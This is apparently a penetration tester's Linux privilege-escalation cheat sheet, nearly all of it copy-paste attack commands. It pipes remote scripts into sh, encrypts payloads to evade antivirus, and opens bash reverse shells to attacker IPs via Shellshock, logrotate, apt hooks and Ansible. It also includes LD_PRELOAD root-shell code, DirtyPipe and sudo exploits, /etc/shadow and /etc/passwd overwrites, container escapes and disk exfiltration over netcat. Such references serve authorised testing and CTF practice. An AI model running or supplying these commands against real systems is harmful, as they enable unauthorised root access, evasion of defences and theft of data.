PrivilageEsc Linux 👑

Remote Network

## ------------------| Remote download and execrute from Github 
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh       
wget -q -O - https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh

Local Network

## ------------------| Local Network
curl 10.10.10.10/linpeas.sh | sh

## ------------------| Without CURL
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.10.10/80 | sh #Victim

## ------------------| Excute from memory and send output back to the host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
wget -q -O - 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
nc -lvnp 9002 | tee linpeas.out #Host

Output Format

## ------------------| Output to file
./linpeas.sh -a > /dev/shm/linpeas.txt #Victim
less -r /dev/shm/linpeas.txt #Read with colors

AV Bypass

## ------------------| open-ssl encryption
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim

## ------------------| Base64 encoded
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim

02. LinEnum

Remote Network

## ------------------| Remote download and execrute from Github 
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh

Local Network

./LinEnum.sh -r report.out -t
# -t            <-- Include thorough (lengthy) tests
# -e /dev/shm/  <-- Export all info by separate one by one

03. Linux Exploit Suggester 2

./linux-exploit-suggester-2.pl -k <KernalVersion>

04. Linux Smart Enumeration

./lse.sh -l 2 -i

05. PSPY

-Linux process snooping [unprivileged]

Download
- 32 bit big, static version: pspy32 download
- 64 bit big, static version: pspy64 download
- 32 bit small version: pspy32s download
- 64 bit small version: pspy64s download

## ------------------| print both commands and file system events and scan procfs every 1000 ms (=1sec)
./pspy64 -pf -i 1000 

## ------------------| place watchers recursively in two directories and non-recursively into a third
./pspy64 -r /path/to/first/recursive/dir -r /path/to/second/recursive/dir -d /path/to/the/non-recursive/dir

## ------------------| disable printing discovered commands but enable file system events
./pspy64 -p=false -f

06. Common exploits

06.0 Abusing Shell Features

## ------------------| If bash < 4.2-048 we can inject to absolute path aswell.
/bin/sh --version
strace -v -f -e execve /path/to/file 2>&1 | grep exec
function /path/to/service { /bin/bash -p; }
export -f /path/to/service
/path/to/file

## ------------------| If bash < 4.4 (Bash debug ps4)
/bin/sh --version
env -i SHELLOPTS=xtrace PS4='$(whoami)' /path/to/file
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/vulnbash; chmod +s /tmp/vulnbash)' /path/to/file                     
/tmp/vulnbash -p

06.1 Shellshock

Date patched      : 24 September 2014
Date discovered   : 12 September 2014
Affected software : Bash (1.0.3–4.3)

h4rithd='() { :; }; echo sh0ck' bash -c :
h4rithd='() { :;}; echo sh0ck' bash -c :
# If print sh0ck; does look like vulnerable to shell shok
# to verify
h4rithd='echo sh0ck' bash -c :
# Nothing print

# Pik any env variable
env
LOGNAME='() { :;}; echo sh0ck' sudo /root/troll

## ------------------| With user agent
curl -A '() { :; }; echo;echo; /bin/bash -i >& /dev/tcp/10.10.14.26/4545 0>&1' http://127.0.0.1/cgi-bin/stats                   
### or
curl -so shellshock.py https://www.exploit-db.com/raw/34900
python shellshock.py  payload=reverse rhost=10.10.14.26 lhost=127.0.0.1 lport=4545 pages=/cgi-bin/stats

06.2 LXD

## ------------------| Find local user account is part of lxd groups.
id

## ------------------| clone the repository and build the build-alpine img
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine
## ------------------| For 32 bit use -a i386 or -a i686
mv alpine-v* alpine.tar.gz
ls -al

## ------------------| Start web server 
python3 -m http.server 80

## ------------------| Download the file on attacker machine.
cd /dev/shm
wget 10.10.14.26/alpine.tar.gz

## ------------------| Execute and gain root shell
lxc image import ./alpine.tar.gz --alias h4rithd
lxc image list
lxc init h4rithd ignite -c security.privileged=true
### if above command get error, try lxd init
lxc list
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
cd /mnt/root

06.3 logrotate

wget https://raw.githubusercontent.com/whotwagner/logrotten/master/logrotten.c
gcc -o logrotten logrotten.c

echo "bash -i >& /dev/tcp/10.10.14.26/4545 0>&1" > shell.sh
chmod +x shell.sh 
echo "test">>/<path>/access.log; ./logrotten <path>/access.log -d  
cp $(pwd)/shell.sh /etc/bash_completion.d/access.log
cat /etc/bash_completion.d/access.log

06.4 DirtyPipe [CVE-2022-0847]

## ------------------| Abstract
## Vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files
## The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102.

## ------------------| Add root user
wget https://raw.githubusercontent.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit/main/exploit.c
gcc -o dpipe exploit.c
./dpipe
su aaron # password : aaron 

## ------------------| Change SUID binary
wget https://raw.githubusercontent.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits/main/exploit-2.c      
gcc -o dpipe exploit-2.c
./dpipe $(which dash)

06.5 If you have or can?

If you have LD_PRELOAD in env_keep variable?

## ------------------| Check if env_keep variable has LD_PRELOAD?
sudo -l

## ------------------| Create C code compiled as a share object (.so extension) file        
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0,0,0);
    system("/bin/bash -p");
}

## ------------------| Complie the c code to share object (.so extension)
gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles

## ------------------| Execute
sudo LD_PRELOAD=/tmp/shell.so <Programe_Listed_in_sudo-l>

If you have LD_LIBRARY_PATH in env_keep variable?

## ------------------| Check if env_keep variable has LD_PRELOAD?
sudo -l

## ------------------| Create C code compiled as a share object
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
 unsetenv("LD_LIBRARY_PATH");
 setresuid(0,0,0);
 system("/bin/bash -p");
}

## ------------------| Complie the c code to share object (.so extension)
gcc -o /tmp/library_path.so -shared -fPIC library_path.c

## ------------------| Hijacking shared objects libcrypt.so.1
## Run ldd against the (sudo -l) programs file to get another
mv /tmp/library_path.so /tmp/libcrypt.so.1

## ------------------| Execute
sudo LD_LIBRARY_PATH=/tmp/ <Programe_Listed_in_sudo-l>

If you have SETENV in sudo -l?

## ------------------|Check
sudo -l | grep SETENV

## ------------------| Execute
sudo PATH=/<PATH>/:$PATH /script.sh

Do we have no_root_squash in /etc/exports

### If the “no_root_squash” option is present on a writable share, we can create an executable with SUID bit set and run it on the target system         
## ------------------| Check if no_root_squash is present?
cat /etc/exports | grep no_root_squash

## ------------------| List mounts and mount it to our local machine
showmount -e <IP>
sudo mkdir -p /mnt/new
sudo mount -t nfs <IP>:/<WritableShares>/mnt/new

### Create a SUID binary and place it. then execuite it via attackers machine.

If you have write permission to /etc/sudoers file?

### Get current user using whoami command, then enter the following line 
username    ALL=(ALL)    NOPASSWD: ALL

### Then run sudo su -

If you have write permission to /etc/shadow file?

## ------------------| Create password 
openssl passwd -6 -salt h4rithd h4rithd123
### -1 --> MD5
### -5 --> SHA256
### -6 --> SHA512
### also you can use it with out salt flag

### Replace the password in /etc/shadow (h4rithd123)
$6$h4rithd$SjZ3XkShHfK9x1Rpn9RhhDH030H4cy.igvwhXGoAb93wEUM9AGR5fjR6ms/oqCqhkopN9Wj/ORX/SlUoaypYI0

sed -i -E 's/^([^:]+:)([^:]+)(..+)$/\1PASSWORD\3/g' /etc/shadow

## ------------------| one line : h4rithd123
sed -i -E 's/^([^:]+:)([^:]+)(..+)$/\1$6$\/dij\/aLbpn4NJrUW$iNXC\/blQ8FP6.kgZmpazax0RNiKBRRVwTuH5e2UFaYUQo8XOKb9aQU8hM7.e2I3omzD4Mp4XRHHzk0B2txbBW\/\3/g' /etc/shadow

If you have write permission to /etc/passwd ?

## ------------------| Create password 
openssl passwd -1 -salt h4rithd Password123 # ->> $1$h4rithd$wXIyqYpzYefGzryBsTFSU/   
   
## ------------------| Edit the passwd file
echo 'h4rithd:$1$h4rithd$wXIyqYpzYefGzryBsTFSU/:0:0:root:/root:/bin/bash' >> /etc/passwd     

## ------------------| Login to the user h4rithd
su h4rithd ## Password123

Can run apache2 as root user?

## ------------------| Read the shadow file
sudo apache2 -f /etc/shadow
## then crack it

If you are in **video ** group

## The video group has access to view the screen output.
## Use w command and find is there any tty1 session (physically logged)
cat /dev/fb0 > /tmp/screen.raw ## Copy that file to host machine.
cat /sys/class/graphics/fb0/virtual_size ## Use this as resolution.
## Open photo using gimp as "RAW image data" and set color mode as RGB565

If you are in docker group

## ------------------| List docker images
docker images | awk '{print $1}' | sed '1d'

## ------------------| Use one of image and get root
docker run -v /:/mnt --rm -it <img_name> chroot /mnt sh

If you have apt update on /etc/crontab

## ------------------| Create pre-invoke script
echo '/bin/bash -c "/bin/bash -i >& /dev/tcp/<HOSTIP>/4545 0>&1"' | base64 -w0
echo 'APT::Update::Pre-Invoke {"echo L2Jpbi9 | base64 -d | bash"}' > /etc/apt/apt.conf.d/000shell

If sudo -l only for apt-get update or apt-get upgrade?

## Watch this video
https://youtube.com/watch?v=EXuEDHFjS9E&t=2070

If you see jdwp run as privilege user ??

## ------------------| First you need to port forword 
ssh -L 8000:127.0.0.1:8000 user@ip 

## ------------------| Using jdwp-shellifier [Best Methord]
git clone https://github.com/IOActive/jdwp-shellifier
cd jdwp-shellifier
### Create reverse shell on /tmp/shell.sh (Victem's machine)
python2 jdwp-shellifier.py -t 127.0.0.1 --break-on "java.lang.String.indexOf" --cmd "/tmp/shell.sh"    

## ------------------| Attached remote port [Connection is not persistence]  
jdb -attach 8000
> classpath ### List class path
> classes   ### List classes
> threads   ### List all threads
> stop in java.lang.String.indexOf(int) ### Set brakepoint
 print new java.lang.Runtime().exec("/bin/touch /tmp/hello.txt")

If you are in disk group ?

## ------------------| Check if you are in disk group.
groups | grep -oP disk

## ------------------| Check if you have R/W permission on sds.
ls -la /dev/sd* 

## ------------------| Check which one belongs to me.
mount | grep '^\/dev'

## ------------------| Try to read it 
strings /dev/sda1 | grep root.txt
debugfs /dev/sda1 ## then use ls commands.

## ------------------| If you do not have access; Check if it link to any other
ls -al /dev/mapper/Kotarak--vg-root  ##Suppose I get an "/dev/dm-0" in response.

## ------------------| Send file using netcat
nc -lvnp 8002 > disk.img.gz ## on attacker's machine
dd if=/dev/dm-0 | gzip -1 - | nc <attackers'IP> 8002

## ------------------| Mout the image file to our machine
gunzip disk.img.gz
mount disk.img /mnt

Can run fail2ban with root prv?

## ------------------| Check which file we have write permission on 
find /etc -writable -ls 2>/dev/null
ls -al /etc/fail2ban/action.d/

## ------------------| Expolit
### Replace "actionban = shell" on /etc/fail2ban/action.d/iptables-multiport.conf
sed 's/actionban =.*/actionban = chmod u+s \/bin\/bash/g' /etc/fail2ban/action.d/iptables-multiport.conf > config.conf
rm -f /etc/fail2ban/action.d/iptables-multiport.conf
mv config.conf /etc/fail2ban/action.d/iptables-multiport.conf
sudo /etc/init.d/fail2ban restart
hydra <IP> ssh -l root -P /usr/share/wordlists/rockyou.txt
ls -l /bin/bash
bash -p

Can you run gdb (debug)?

## ------------------| Find process which run under root prv
ps -aux | grep root | grep "python"

## ------------------| Attach the gdb instance to that specific process ID
gdb -p 

## ------------------| Hook/Call the process
call (void)system("chmod u+s /bin/bash")
quite
bash -p

If you can read .Xauthority file?

## ------------------| Check if it contain MIT-magic-cookie-1
xxd .Xauthority 

## ------------------| Check what display is currently connected (:0)
w

## ------------------| Verify Cookie
XAUTHORITY=/tmp/.Xauthority xdpyinfo -display :0
XAUTHORITY=/tmp/.Xauthority xwininfo -root -tree -display :0

## ------------------| Take Screenshot
XAUTHORITY=/tmp/.Xauthority xwd -root -screen -silent -display :0 > /tmp/capture.xwd

## ------------------| Convert
sudo apt install imagemagick -y
convert capture.xwd capture.png

If you can run dstat tool as sudo

## ------------------| Find configuration settings
find / -type d -name dstat 2>/dev/null

## ------------------| Assume the location is "/usr/local/share/dstat"
echo "import os;os.system('sudo chmod +s /usr/bin/bash')" > /usr/local/share/dstat/dstat_h4rithd.py                        
dstat --list | grep h4rithd
sudo -u root /usr/bin/dstat --h4rithd 
bash -p

If we can run any doas

## ------------------| Find configuration settings
find / -type f -name doas.conf 2>/dev/null

## ------------------| run as another user
doas -u root /usr/bin/bash

06.6 SUDO Vulnerability

CVE-2023-22809

## ------------------| Affected sudo versions: 1.8.0 to 1.9.12p1
sudo -V

## ------------------| Exploit
export EDITOR="vim -- /etc/passwd"
sudoedit /etc/motd
### change any user group to 0

06.7 Ansible

## ------------------| Reverse Shell
- hosts: localhost
  tasks:
  - name: rev
    shell: bash -c 'bash -i >& /dev/tcp/<IP>/4545 0>&1'

## ------------------|

06.8 Other

##_______________________________________________________________________________
## Sudo 1.8.27 - Security Bypass (CVE: 2019-14287)
sudo -u#-1 /bin/bash

##_______________________________________________________________________________
## CVE-2021-3156 sudo Vulnerability Allows Root Privileges
## https://blog.aquasec.com/cve-2021-3156-sudo-vulnerability-allows-root-privileges
## versions 1.7.7 through 1.7.10p9, 1.8.2 through 1.8.31p2, and 1.9.0 through 1.9.5p1 are affected.
sudoedit -s '\' `perl -e 'print "A" x 65536'`
## If you receive a usage or error message, sudo is not vulnerable. If the result is a Segmentation fault, sudo is vulnerable  

##_______________________________________________________________________________
## USBCreator D-Bus Privilege Escalation in Ubuntu Desktop
gdbus call -y -d com.ubuntu.USBCreator -o /com/ubuntu/USBCreator -m com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /dev/shm/rootkey true

07. Kernel Privesc

PreviousLateral Movement NextWindows

Last updated 2 years ago